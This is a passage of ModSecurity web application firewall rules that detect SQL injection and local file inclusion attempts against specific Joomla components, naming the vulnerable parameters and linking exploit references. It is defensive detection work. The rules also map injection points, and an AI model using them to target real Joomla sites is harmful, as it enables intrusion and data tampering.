Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010925) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010925,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010926,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010927,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010928,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010947,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'" SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010990,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010991) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010991,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010992,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010993) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010993,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010981) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010981,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010982) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010982,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010983) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010983,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010984,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010985) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010985,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011001) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011001,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011002,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011003) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011003,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011004) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011004,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011005,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011022,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 